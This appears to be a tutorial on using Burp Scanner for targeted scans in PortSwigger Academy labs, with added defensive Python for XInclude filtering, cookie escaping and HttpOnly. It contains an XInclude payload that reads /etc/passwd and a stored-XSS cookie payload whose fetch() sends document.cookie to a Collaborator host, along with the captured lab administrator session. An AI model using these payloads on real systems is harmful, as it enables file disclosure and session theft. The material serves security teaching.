Burp Scanner

Besides running a full-site scan with Burp Scanner, you can also use it to speed up a manual testing workflow. Two common uses are described below.


Scanning specific requests

When you run into an interesting function or behaviour, hand the request to Burp Scanner to check it for security issues. For example:

While browsing the site and reviewing requests, you notice a /product/stock request whose productId parameter looks suspicious; you judge it to be a likely vulnerable endpoint.

In Proxy > HTTP history, select the /product/stock request, right-click it and choose Do active scan.

The scan reports an Out-of-band resource load (HTTP) issue: the application can be induced to fetch the content of an arbitrary external URL and return it in its own response. You can therefore add XML to the request by hand to retrieve /etc/passwd:

POST /product/stock HTTP/1.1
...omit...

productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
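The finding above exists because the server parses a user-supplied parameter as XML and then honours xi:include directives, so the parser's loader fetches whatever href the caller names. The following is an added Python example (not code from this page or from PortSwigger) showing the defender's side with the standard library: find_xinclude_hrefs flags inclusion directives in untrusted XML before they are processed, and expand_includes resolves xi:include only through a loader restricted to a hypothetical in-memory allow-list (ALLOWED_FRAGMENTS and the fragments/footer.txt name are constructed for the example).

```python
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"

# Constructed input: the productId value from the request above, as the server
# sees it once the POST body has been URL-decoded.
HOSTILE_PRODUCT_ID = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/></foo>'
)

# Constructed input: a document that includes only a fragment the application
# itself owns (hypothetical name, not from the page).
BENIGN_DOC = (
    '<doc xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="fragments/footer.txt"/></doc>'
)

# Hypothetical allow-list: the only documents the application may include,
# held in memory so the example runs offline.
ALLOWED_FRAGMENTS = {"fragments/footer.txt": "Standard footer text"}


def find_xinclude_hrefs(xml_text):
    """Detection: list the href of every element in the XInclude namespace.

    An empty list means the document carries no inclusion directives; anything
    else inside user-controlled XML deserves a log entry before parsing goes on.
    """
    root = ET.fromstring(xml_text)
    prefix = "{%s}" % XINCLUDE_NS
    return [el.get("href") for el in root.iter() if el.tag.startswith(prefix)]


def restricted_loader(href, parse, encoding=None):
    """Loader handed to ElementInclude: refuses every href outside the allow-list.

    ElementInclude's default loader opens href with open()/urlopen(), which is
    exactly how a file:///etc/passwd reference ends up in the response.
    """
    if parse != "text" or href not in ALLOWED_FRAGMENTS:
        raise PermissionError("XInclude href refused: %r" % href)
    return ALLOWED_FRAGMENTS[href]


def expand_includes(xml_text):
    """Parse untrusted XML and resolve xi:include only through restricted_loader."""
    root = ET.fromstring(xml_text)  # fromstring on its own never follows xi:include
    ElementInclude.include(root, loader=restricted_loader)
    return root


def includes_are_allowed(xml_text):
    """True when every xi:include in the document resolves via the allow-list."""
    try:
        expand_includes(xml_text)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    print(find_xinclude_hrefs(HOSTILE_PRODUCT_ID))  # ['file:///etc/passwd']
    print(expand_includes(BENIGN_DOC).text)          # Standard footer text
    print(includes_are_allowed(HOSTILE_PRODUCT_ID))  # False
```

The split between the two functions is deliberate: the detection step gives you a log line naming the offending href (useful for a WAF rule or alert), while the loader is the control that actually stops local files and remote URLs from being read even if detection is bypassed.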

Lab: Discovering vulnerabilities quickly with targeted scanning


Scanning custom insertion points

If a particular parameter in a request interests you, you can point the scanner at just that parameter. For example:

After reviewing the site, the string wiener in the request below looks suspicious, so select it, right-click and choose Scan manual insertion point.

GET /my-account?id=wiener HTTP/1.1
Host: 0a24008b03c8fdc781b2129000450061.web-security-academy.net
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a24008b03c8fdc781b2129000450061.web-security-academy.net/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=wiener%3aOPE3sqEQ5dscrWnH1kGPvQrE2uKyM2mK

When the scan finishes, open the report in the Dashboard; it shows a Cross-site scripting (stored) issue, found with the following request:

GET /my-account?id=wiener HTTP/1.1
Host: 0a24008b03c8fdc781b2129000450061.web-security-academy.net
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a24008b03c8fdc781b2129000450061.web-security-academy.net/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session='%22%3e%3csvg%2fonload%3dfetch%60%2f%2f7hp0l2dgbf5gi9x5uwe4uu3wxn3gr6fy5mwcj27r%5c.burpcollaborator.net%60%3e%3aOPE3sqEQ5dscrWnH1kGPvQrE2uKyM2mK

In Collaborator, copy a fresh payload location (g4l3v1mkp2sxyue30wwex79u9lfb30.burpcollaborator.net), substitute it for the location in the scanner's request, and resend the request:

GET /my-account?id=wiener HTTP/1.1
Host: 0acc00ec04dbbaf98304bed20018002e.web-security-academy.net
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0acc00ec04dbbaf98304bed20018002e.web-security-academy.net/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session='"><svg/onload=fetch(//g4l3v1mkp2sxyue30wwex79u9lfb30.burpcollaborator.net/${encodeURIComponent(document.cookie)})>:OPE3sqEQ5dscrWnH1kGPvQrE2uKyM2mK

Collaborator then receives the request below. Its path is the document.cookie of whoever viewed the page, URL-encoded; decoding it yields session=administrator%3aKznxZTGA60H0yjN5h9AdKI7Qr2LdcCfm (administrator:KznxZTGA60H0yjN5h9AdKI7Qr2LdcCfm once the %3a is decoded), so the administrator's session has been captured.

GET /session%3Dadministrator%253aKznxZTGA60H0yjN5h9AdKI7Qr2LdcCfm%3B%20secret%3DLCh8KAlFhQbU6Qf8xqnD2w0KZ7sEZcW6%3B%20session%3Dadministrator%253aKznxZTGA60H0yjN5h9AdKI7Qr2LdcCfm HTTP/1.1
Host: g4l3v1mkp2sxyue30wwex79u9lfb30.burpcollaborator.net
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
sec-ch-ua-platform: "Linux"
Accept: */*
Origin: https://0acc00ec04dbbaf98304bed20018002e.web-security-academy.net
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0acc00ec04dbbaf98304bed20018002e.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
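Reading a callback like the one above correctly, and understanding why the finding exists, is the defender's side of this issue. The following is an added Python example, not code from this page or from PortSwigger: leaked_cookies decodes a Collaborator request line into the cookies it carried (two decoding passes, because encodeURIComponent was applied on top of the application's own %3a encoding of the cookie value), and the two helpers after it are hypothetical stand-ins for the lab's account template and Set-Cookie logic (neither is on the page), showing the HTML escaping that would stop the reflected cookie value from becoming markup and the HttpOnly flag that would keep the session out of document.cookie in the first place.

```python
import html
from urllib.parse import quote, unquote

# The request line of the Collaborator hit shown above (lab values from the
# page; not a live session).
CALLBACK_REQUEST_LINE = (
    "GET /session%3Dadministrator%253aKznxZTGA60H0yjN5h9AdKI7Qr2LdcCfm%3B%20"
    "secret%3DLCh8KAlFhQbU6Qf8xqnD2w0KZ7sEZcW6%3B%20"
    "session%3Dadministrator%253aKznxZTGA60H0yjN5h9AdKI7Qr2LdcCfm HTTP/1.1"
)

# Constructed: the shape of value the scanner placed in the session cookie
# (hostname is a placeholder, not a real Collaborator location).
INJECTED_USERNAME = "'\"><svg/onload=fetch(`//collaborator.example`)>"


def leaked_cookies(request_line):
    """Triage: recover the cookies that a
    fetch(//host/${encodeURIComponent(document.cookie)}) callback carried in its path.

    First unquote undoes encodeURIComponent and gives back the document.cookie
    text; the second undoes the application's own %3a encoding of ':' inside
    each cookie value.
    """
    method, path, _version = request_line.split(" ", 2)
    if method != "GET":
        raise ValueError("unexpected method %r" % method)
    cookie_text = unquote(path.lstrip("/"))  # session=administrator%3a...; secret=...
    cookies = {}
    for pair in cookie_text.split(";"):
        name, _, value = pair.strip().partition("=")
        if name:
            cookies[name] = unquote(value)   # administrator:Kznx...
    return cookies


def render_account_heading(username, escape=True):
    """Hypothetical account template that reflects the username taken from the
    session cookie. Without escaping, the injected value closes the quotes and
    the <svg> tag becomes live markup; html.escape neutralises <, >, ' and ".
    """
    shown = html.escape(username, quote=True) if escape else username
    return "<h1>Your username is: %s</h1>" % shown


def session_set_cookie(username, token):
    """Hypothetical issuer for the session cookie: HttpOnly keeps it out of
    document.cookie, so a script injection cannot exfiltrate it; Secure and
    SameSite=Lax limit where the browser will send it.
    """
    value = quote("%s:%s" % (username, token), safe="")
    return "Set-Cookie: session=%s; HttpOnly; Secure; SameSite=Lax" % value


if __name__ == "__main__":
    for name, value in leaked_cookies(CALLBACK_REQUEST_LINE).items():
        print(name, "=", value)
    print(render_account_heading(INJECTED_USERNAME, escape=False))
    print(render_account_heading(INJECTED_USERNAME))
    print(session_set_cookie("wiener", "EXAMPLE-TOKEN"))
```

Note that output escaping and HttpOnly address different halves of the finding: escaping removes the injection, while HttpOnly limits what an injection that slips through can steal. Neither replaces the other, and the secret cookie visible in the callback would need the same flag.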

Lab: Scanning non-standard data structures